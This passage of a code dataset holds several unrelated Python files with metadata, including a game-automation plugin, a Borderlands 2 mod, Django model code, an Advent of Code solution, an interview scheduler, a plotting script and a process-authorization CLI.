13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18803798233", "text": "import lib.find as f\nimport time\nfrom loguru import logger\nimport lib.adb_command as adb\nimport plugins.mission_ready as ready\nimport plugins.path as path\n\nIMAGE_BASE_EXP = 'imgs/wild/base_exp'\nIMAGE_BASE_WILDERNESS = 'imgs/wild/wilderness'\nIMAGE_BASE_FRIEND = 'imgs/wild/base_friend'\nIMAGE_BASE_MONEY = 'imgs/wild/base_money'\nIMGAE_BUILDING_CHECKER = 'imgs/wild/building_checker'\nIMAGE_BASE_CHECKER = 'imgs/wild/base_checker'\nIMAGE_CHAT_CHECKER = 'imgs/wild/chat_checker'\nIMGAE_CHAT = 'imgs/wild/chat'\n\ndef back_to_land():\n out=f.cut_find_html(IMGAE_BUILDING_CHECKER,1140,14,1307,81)\n if out[0]is not None:\n 
logger.debug('Accidentally entered a building, going back')\n        adb.touch((60,60))\n        time.sleep(1) \n\ndef wild_start():\n    \"\"\"Collect the idle products from the Wilderness\"\"\"\n    while not path.to_menu():\n        pass\n    adb.touch(f.find(IMAGE_BASE_WILDERNESS))\n    logger.info('Entering the Wilderness')\n    while(True):\n        time.sleep(3)\n        if (f.find(IMAGE_BASE_CHECKER)[2]>0.7):\n            break\n    adb.touch(f.find(IMAGE_BASE_EXP))\n    time.sleep(2)\n    back_to_land() # avoid accidentally entering the building page\n    adb.touch(f.find(IMAGE_BASE_MONEY))\n    time.sleep(2)\n    back_to_land()\n    xy=f.cut_find_html(IMAGE_BASE_FRIEND,0,112,140,571)\n    if xy[0] is not None:\n        adb.touch(xy)\n    # handle the dialogue\n    time.sleep(5)\n    res=f.cut_find_html(IMGAE_CHAT,1462,165,1579,768)\n    res2=f.cut_find_html(IMAGE_CHAT_CHECKER,1365,801,1585,890,False)\n    if res[0] is not None or res2[0] is not None:\n        for _ in range(15):\n            if res[0] is not None:\n                logger.debug('IMAGE_CHAT found')\n                adb.touch(res)\n            if res2[0] is not None:\n                logger.debug('IMAGE_CHAT_CHECKER found')\n                adb.touch(res2)\n            time.sleep(2)\n            res=f.cut_find_html(IMGAE_CHAT,1462,165,1579,768)\n            res2=f.cut_find_html(IMAGE_CHAT_CHECKER,1365,801,1585,890,False)\n            if res[0] is None and res2[0] is None:\n                break\n    else:\n        return False\n    return True", "repo_name": "YumisLink/1999-Auto", "sub_path": "plugins/wilderness.py", "file_name": "wilderness.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lib.find.cut_find_html", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 18, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 20, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 21, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "plugins.path.to_menu", "line_number": 26, "usage_type": "call"}, {"api_name": "plugins.path", "line_number": 26, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 28, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.find.find", "line_number": 32, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 34, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 34, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 34, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 34, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.adb_command.touch", "line_number": 37, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 37, "usage_type": "name"}, {"api_name": "lib.find.find", "line_number": 37, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 37, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 40, "usage_type": "call"}, {"api_name": "lib.find", 
"line_number": 40, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 42, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 42, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 45, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.find.cut_find_html", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 50, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 50, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 51, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 53, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 53, "usage_type": "name"}, {"api_name": "lib.adb_command.touch", "line_number": 54, "usage_type": "call"}, {"api_name": "lib.adb_command", "line_number": 54, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.find.cut_find_html", "line_number": 56, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 56, "usage_type": "name"}, {"api_name": "lib.find.cut_find_html", "line_number": 57, "usage_type": "call"}, {"api_name": "lib.find", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "24338605115", "text": "from typing import Callable, Any\nimport datetime\nimport dataclasses\n\nimport unrealsdk\n\nfrom ..rewards import Reward\n\n\ndef _claim(reward: Reward, pc: unrealsdk.UObject) -> None:\n mission_def = unrealsdk.FindObject(\"MissionDefinition\", \"GD_Episode01.M_Ep1_Champion\")\n backup_game_stage = mission_def.GameStage\n backup_title = mission_def.MissionName\n backup_credits = mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant\n backup_reward_items = [r for r in mission_def.Reward.RewardItems]\n backup_reward_item_pools = [p for p in mission_def.Reward.RewardItemPools]\n\n mission_def.GameStage = reward.level\n pc.RCon(f\"set GD_Episode01.M_Ep1_Champion MissionName {reward.description}\")\n mission_def.Reward.RewardItems = []\n reward_pool = unrealsdk.FindObject(\"Object\", reward.lootpool)\n mission_def.Reward.RewardItemPools = [reward_pool, reward_pool]\n mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant = 10\n\n def magic():\n pc.ServerGrantMissionRewards(mission_def, False)\n pc.ShowStatusMenu()\n\n def reset_mission_def() -> None:\n mission_def.GameStage = backup_game_stage\n pc.RCon(f\"set GD_Episode01.M_Ep1_Champion MissionName {backup_title}\")\n mission_def.Reward.RewardItems = backup_reward_items\n mission_def.Reward.RewardItemPools = backup_reward_item_pools\n mission_def.Reward.CreditRewardMultiplier.BaseValueScaleConstant = backup_credits\n\n call_in(5, reset_mission_def)\n\n call_in(0.01, magic)\n\n\ndef call_in(time: float, call: Callable[[], Any]) -> None:\n \"\"\"Call the given callable after the given time has passed.\"\"\"\n timer = datetime.datetime.now()\n future = timer + datetime.timedelta(seconds=time)\n\n # Create a wrapper to call the routine that is suitable to be passed to RunHook.\n def tick(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # Invoke the routine. 
If it returns False, unregister its tick hook.\n if datetime.datetime.now() >= future:\n call()\n unrealsdk.RemoveHook(\"WillowGame.WillowGameViewportClient.Tick\", \"RewardCallIn\" + str(call))\n return True\n\n # Hook the wrapper.\n unrealsdk.RegisterHook(\"WillowGame.WillowGameViewportClient.Tick\", \"RewardCallIn\" + str(call), tick)\n\n\nclass RewardMixin:\n reward: Reward\n claimed: bool\n\n def claim_reward(self, pc: unrealsdk.UObject) -> None:\n reward: Reward = self.reward\n reward_copy = dataclasses.replace(reward)\n _claim(reward_copy, pc)\n self.claimed = True\n\n @property\n def reward_desc(self) -> str:\n return self.reward.description\n", "repo_name": "juso40/bl2sdk_Mods", "sub_path": "BadassBounties/mixins/reward.py", "file_name": "reward.py", "file_ext": "py", "file_size_in_byte": 2704, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rewards.Reward", "line_number": 10, "usage_type": "name"}, {"api_name": "unrealsdk.UObject", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unrealsdk.FindObject", "line_number": 11, "usage_type": "call"}, {"api_name": "unrealsdk.FindObject", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "unrealsdk.UObject", "line_number": 47, "usage_type": "attribute"}, {"api_name": "unrealsdk.UFunction", "line_number": 47, "usage_type": "attribute"}, {"api_name": "unrealsdk.FStruct", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "unrealsdk.RemoveHook", "line_number": 51, "usage_type": "call"}, {"api_name": "unrealsdk.RegisterHook", "line_number": 55, "usage_type": "call"}, {"api_name": "rewards.Reward", "line_number": 59, "usage_type": "name"}, {"api_name": "unrealsdk.UObject", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rewards.Reward", "line_number": 63, "usage_type": "name"}, {"api_name": "dataclasses.replace", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31222750827", "text": "import sys\nsys.path.append(\"../\")\nfrom django.db import models\nfrom .product_type_model import ProductType\nfrom .customer_model import Customer\n\n\nclass Product(models.Model):\n \"\"\"\n Class to represent a product for sale on Bangazon\n tied to a\n particular User(customer) of bangazon API\n Extension of models.Model\n Variables:\n created: the current local date and time of creation\n name: the product's name\n \n customer: the foreign key of Customer class\n\n Author: Julia Kim-Chung\n \"\"\"\n created = models.DateTimeField(auto_now_add=True)\n name = models.CharField(max_length=100, blank=True, default=\"\")\n price = models.DecimalField(max_digits=20, decimal_places=2)\n description = models.TextField(max_length=300, default='')\n quantity = models.IntegerField()\n product_type =models.ForeignKey(ProductType, related_name=\"products\", on_delete=models.CASCADE, blank=True, null=True)\n customer =models.ForeignKey(Customer, related_name=\"products\", on_delete=models.CASCADE)\n\n def 
__str__(self):\n        \"\"\"\n        Method to create a string representing a Product sold/bought by a particular User(customer)\n        \"\"\"\n\n        return self.name\n\n    class Meta:\n        ordering =('name', )\n\n", "repo_name": "Ludicrous-Ducks/Bangazon_django", "sub_path": "bangazon/Bangazon_api/models/product_model.py", "file_name": "product_model.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "product_type_model.ProductType", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": "call"}, {"api_name": "customer_model.Customer", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "13310872166", "text": "from django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\ndef validate_date(date):\n    if date > timezone.now().year:\n        raise ValidationError(\n            ('The given year %(date)s is later than the current time.'),\n            params={'date': date},\n        )\n", "repo_name": "gasimovv21/yamdb_final", "sub_path": "api_yamdb/reviews/validators.py", "file_name": "validators.py", "file_ext": "py", "file_size_in_byte": 320, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.utils.timezone.now", "line_number": 6, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 6, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "6778277104", "text": "import io\nfrom functools import reduce\n\nINPUT = \"input1.txt\"\n\n# ------------------------------------------------------\n# Load\n\n\ndef load():\n    with io.open(INPUT, \"r\", encoding=\"utf-8\") as f:\n        return [l.strip() for l in f]\n\n\n# ------------------------------------------------------\n# Functiony functions\n\n\ndef find_common(t):\n    intersect = reduce(lambda x, y: x & y, t)\n    assert len(intersect) == 1\n    return intersect.pop()\n\n\ndef partition_in_3(l):\n    n = len(l)\n    assert n % 3 == 0\n    return [(set(l[i]), set(l[i + 1]), set(l[i + 2])) for i in range(0, n, 3)]\n\n\ndef prioritize(c) -> int:\n    if c.islower():\n        return ord(c[0]) - ord(\"a\") + 1\n\n    return ord(c[0]) - ord(\"A\") + 27\n\n\ndef to_sets(s: str) -> tuple:\n    n = len(s)\n    assert n % 2 == 0\n    mid = n >> 1\n    return (set(s[:mid]), set(s[mid:]))\n\n\n# ------------------------------------------------------\n# Main\n\n\ndef main():\n    packs = load()\n\n    solution1 = sum(map(prioritize, map(find_common, map(to_sets, packs))))\n    print(f\"Solution 1:\\t{solution1}\")\n\n    solution2 = sum(map(prioritize, map(find_common, partition_in_3(packs))))\n    print(f\"Solution 2:\\t{solution2}\")\n\n\nif __name__ == \"__main__\":\n    main()\n", "repo_name": "JeffreyMFarley/adventofcode", "sub_path": "2022/day03/solve1.py", "file_name": "solve1.py", "file_ext": "py", "file_size_in_byte": 1204, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.open", "line_number": 11, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "7145254908", "text": "import os\nimport random\nimport pandas as pd\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom openpyxl.styles import PatternFill\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nfrom openpyxl import Workbook\n\n\ndef _read_interviewee_sheet():\n    \"\"\"\n    Check the below JS function to get the schedule from when2meet.\n    (https://www.when2meet.com/?18687020-njdRB)\n    function getCSV() {\n        result = \"Time,\" + PeopleNames.join(\",\")+\"\\n\";\n        for(let i = 0; i < AvailableAtSlot.length; i++) {\n            let slot = $x(`string(//div[@id=\"GroupTime${TimeOfSlot[i]}\"]/@onmouseover)`);\n            slot = slot.match(/.*\"(.*)\".*/)[1];\n            result += slot + \",\";\n            result += PeopleIDs.map(id => AvailableAtSlot[i].includes(id) ? 
1 : 0).join(\",\");\n result+= \"\\n\";\n }\n console.log(result);\n }\n getCSV();\n :return:\n \"\"\"\n sheet = defaultdict(list)\n interviewee = \"/\".join([os.getcwd(), \"input\", \"interviewee.txt\"])\n with open(interviewee, \"r\") as f:\n date = 25\n for interviewee_row in f.readlines():\n if \"#\" in interviewee_row:\n date += 1\n else:\n # formatting\n avaliables = interviewee_row.split(' - ')\n avaliables[1] = avaliables[1].replace(\"\\'\", \"\")\n avaliables[1] = avaliables[1].replace(\", \", \",\")\n avaliables[1] = avaliables[1][1:-2]\n avaliables[1] = avaliables[1].split(\",\")\n avaliables[0] = \":\".join([str(date), avaliables[0].split(\" ~ \")[0]])\n sheet[avaliables[0]].extend(avaliables[1])\n return sheet\n\n\ndef _read_interviewer_sheet():\n sheet = defaultdict(list)\n interviewer = \"/\".join([os.getcwd(), \"input\", \"interviewer.csv\"])\n df = pd.read_csv(interviewer)\n for row_id, row in df.iterrows():\n time_slot = datetime.strptime(row[0], '%a %d %b %Y %I:%M:%S %p %Z')\n time_slot = time_slot.strftime('%d:%H:%M')\n for co_id, interviewer in enumerate(row):\n if interviewer == 1:\n sheet[time_slot].append(df.columns[co_id])\n return sheet\n\n\ndef generate_interview_schedule():\n interviewers = _read_interviewee_sheet()\n interviewees = _read_interviewer_sheet()\n\n candidates = dict()\n assignments = list()\n all_times = list(set(interviewers.keys()) & set(interviewees.keys()))\n\n for t in all_times:\n candidates[t] = {\n 'interviewer': interviewers[t],\n 'interviewee': interviewees[t]\n }\n for t in all_times:\n candidates_t = candidates[t]\n if len(candidates_t['interviewer']) > 0 and len(candidates_t['interviewee']) > 0:\n interviewee = random.choice(candidates_t['interviewee'])\n interviewers_t = candidates_t['interviewer']\n interviewer = random.choice(interviewers_t)\n interviewers_t.remove(interviewer)\n assignments.append({\n \"date:time\": t,\n \"interviewer\": interviewer,\n \"interviewee\": interviewee,\n \"candidates\": \", \".join(interviewers_t)\n })\n candidates_t['interviewee'].remove(interviewee)\n\n return assignments\n\n\ndef make_schedule_sheet(sheet):\n df = pd.DataFrame(sheet)\n df = df.sort_values(by=[\"date:time\"], ascending=[True])\n wb = Workbook()\n ws = wb.active\n for r in dataframe_to_rows(df, index=False, header=True):\n ws.append(r)\n green_fill = PatternFill(start_color='00FF00', end_color='00FF00', fill_type='solid')\n pink_fill = PatternFill(start_color='F781F3', end_color='F781F3', fill_type='solid')\n for row in ws.iter_rows(min_row=2, max_col=len(df.columns) + 1):\n for cell in row:\n # coloring test\n if '25' in str(cell.value):\n cell.fill = pink_fill\n elif '26' in str(cell.value):\n cell.fill = green_fill\n wb.save(\"output/schedule.xlsx\")\n\n\nif __name__ == \"__main__\":\n schedule_candidate = generate_interview_schedule()\n make_schedule_sheet(schedule_candidate)\n\n\n", "repo_name": "chaeheekang/test_make_interview_schedule", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 30, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 51, "usage_type": "call"}, {"api_name": 
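# A small illustrative sketch (hypothetical slot and person names, not from
# the record above) of the defaultdict(list) pattern the scheduler builds on:
# map each "day:hour" slot to the people available, then intersect the two key
# sets to find slots where both sides can meet.
from collections import defaultdict

interviewers = defaultdict(list)
interviewees = defaultdict(list)
interviewers["25:10:00"].append("alice")
interviewees["25:10:00"].append("bob")

for slot in set(interviewers) & set(interviewees):
    print(slot, interviewers[slot], interviewees[slot])  # 25:10:00 ['alice'] ['bob']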
"datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 95, "usage_type": "call"}, {"api_name": "openpyxl.utils.dataframe.dataframe_to_rows", "line_number": 97, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 99, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "32882246857", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nfrom glob import glob\n\nmaindir = '/Users/taylorvenenciano/Desktop/OFET_IV'\nsubdir = '4_14_OFETs'\nsubsubdir = 'Run 1' # will graph all files ending in .txt in this folder name, labeled as 1_10V.txt\nall_dir = glob(os.path.join(maindir, subdir, subsubdir, \"*.txt\")) #adjust to determine directory\nsort = sorted(all_dir) # ordering data so that legend is nice\n\nfor item in sort:\n frame = pd.read_table(item)\n volt = frame['Voltage (V)']\n curr = frame['Current (A)']\n curr_micro = pd.to_numeric(curr)*(10**6) # changing unit to microA\n name = os.path.split(item)[1] #using name of file for legend\n name2 = name.split('_')[1] #modify here for naming convention\n name3 = name2.split('.')[0]#modify here for naming convention\n plt.plot(volt, -curr_micro, label = name3) #if current is positive, put negative curr_micro, change label for legend\n \nplt.xlabel('Voltage (V)')\nplt.ylabel('Current (\\N{MICRO SIGN}A)')\nplt.title('IV Curves ' + subdir) #adjust title of graph\nplt.xlim([40,0]) #adjust x-range\nplt.ylim([-60,0]) #adjust y-range\nplt.legend()\nplt.show()", "repo_name": "tvenen/hudgings_lab_OFET", "sub_path": "ivgraph_ofets.py", "file_name": "ivgraph_ofets.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pandas.read_table", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 26, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "9989367702", "text": "import argparse\nimport json\nimport os\nimport pwd\n\nfrom tools import readFromFile, writeInJsonFile\nfrom process_manage_user import mainProcessAuthorizationExe, addUserInJson\nfrom manage_process import responseForAction\n\nfrom env import ALLOW_EXE, DENY_EXE, ALWAYS_ASK_EXE, PROCESS_EXE, PATH_TO_PROCESS_EXE, FILE_ALL_PROCESS_PID_WAITING\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-a\", \"--action\", type=str, help=\"Action pour gérer un processus.\", required=True)\nparser.add_argument(\"-d\", \"--path_folder\", type=str, help=\"Chemin du dossier pour appliquer une action.\")\nparser.add_argument(\"-f\", \"--path_file\", type=str, help=\"Chemin du fichier pour appliquer une action.\")\nparser.add_argument(\"-p\", \"--pid\", type=int, help=\"Pid du processus pour appliquer une action.\")\n\nparser.add_argument(\"-u\", \"--user\", type=str, help=\"Action pour un utilisateur spécifiques. Si l'utilisateur n'existe pas dans le fichier JSON, celui-ci se créera.\")\nparser.add_argument(\"-s\", \"--suppress\", type=str, help=\"Supprime une action dans la liste des actions.\")\nparser.add_argument(\"-l\", \"--list_action\", help=\"Liste les actions fait sur certains processus au format json.\", action='store_true')\nparser.add_argument(\"-w\", \"--waiting_process\", help=\"Liste les processus en attente d'actions.\", action='store_true')\n\nargs = parser.parse_args()\n\nUSER = \"all\"\n\ndef getAction(action):\n '''\n Permet de trouver les bonnes énumérations afin d'appliquer une action sur un processus \n '''\n if action == \"acc\":\n return ALLOW_EXE\n elif action == \"den\":\n return DENY_EXE\n elif action == \"ask\":\n return ALWAYS_ASK_EXE\n else:\n return None\n\nif __name__ == \"__main__\":\n '''\n MAIN CLI\n '''\n if args.action == None:\n parser.print_help()\n exit(-1)\n elif args.action != \"acc\" and args.action != \"den\":\n print(\"Les actions pour gérer les processus :\\n\\t- {}\\n\\t- {}\\n\".format(\"acc\", \"den\"))\n parser.print_help()\n exit(-1)\n\n if args.user != None and args.user != \"all\":\n try:\n pwd.getpwnam(args.user)\n addUserInJson(args.user)\n USER = args.user\n except KeyError:\n print(\"L'utilisateur {} n'existe pas.\".format(args.user))\n\n if args.path_folder != None:\n if os.path.isdir(args.path_folder):\n main_process_authorization = mainProcessAuthorizationExe(args.path_folder, USER, authorization_exe_decision=args.action)\n print(\"main_process_authorization --> {}\".format(main_process_authorization))\n else:\n print(\"[Erreur] Le dossier {} n'existe pas.\".format(args.path_folder))\n elif args.path_file != None:\n if os.path.isfile(args.path_file):\n main_process_authorization = mainProcessAuthorizationExe(args.path_file, USER, authorization_exe_decision=args.action)\n print(\"main_process_authorization --> {}\".format(main_process_authorization))\n else:\n print(\"[Erreur] Le fichier {} n'existe pas.\".format(args.path_file))\n elif args.pid != None:\n pid = args.pid\n responseForAction(args.pid, USER, args.action)\n elif args.list_action != None and args.list_action:\n print(\"args.list_action --> 
{}\".format(args.list_action))\n read_authorization_exe = readFromFile()\n action = getAction(args.action)\n if action != None:\n print(json.dumps(read_authorization_exe[USER][action], sort_keys=True, indent=4))\n else:\n print(\"Aucune action {} n'a été mise en place.\".format(action))\n elif args.waiting_process != None and args.waiting_process:\n read_wainting_process = readFromFile(json_file=FILE_ALL_PROCESS_PID_WAITING)\n print(json.dumps(read_wainting_process, sort_keys=True, indent=4))\n elif args.suppress != None:\n print(\"args.list_action --> {}\".format(args.list_action))\n read_authorization_exe = readFromFile()\n action = getAction(args.action)\n if action != None:\n try:\n action_path = None\n if os.path.isdir(args.suppress):\n action_path = PATH_TO_PROCESS_EXE\n elif os.path.isfile(args.suppress):\n action_path = PROCESS_EXE\n else:\n print(\"Le chemin ou dossier n'existe pas.\")\n exit(1)\n \n read_authorization_exe[USER][action][action_path].remove(args.suppress)\n writeInJsonFile(read_authorization_exe)\n print(\"test ----> {}\\n\".format(read_authorization_exe))\n\n except KeyError as ke:\n print(\"[KeyError] {}\".format(ke))\n except ValueError:\n print(\"Le chemin {} n'existe pas dans l'action {} chez l'utilisateur {}.\".format(args.suppress, args.action, USER))\n else:\n print(\"Aucune action {} n'a été mise en place.\".format(action))\n else:\n parser.print_help()\n exit(-1)", "repo_name": "Gershpenst/manage-process-python", "sub_path": "cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 5008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "env.ALLOW_EXE", "line_number": 32, "usage_type": "name"}, {"api_name": "env.DENY_EXE", "line_number": 34, "usage_type": "name"}, {"api_name": "env.ALWAYS_ASK_EXE", "line_number": 36, "usage_type": "name"}, {"api_name": "pwd.getpwnam", "line_number": 54, "usage_type": "call"}, {"api_name": "process_manage_user.addUserInJson", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "process_manage_user.mainProcessAuthorizationExe", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "process_manage_user.mainProcessAuthorizationExe", "line_number": 68, "usage_type": "call"}, {"api_name": "manage_process.responseForAction", "line_number": 74, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 84, "usage_type": "call"}, {"api_name": 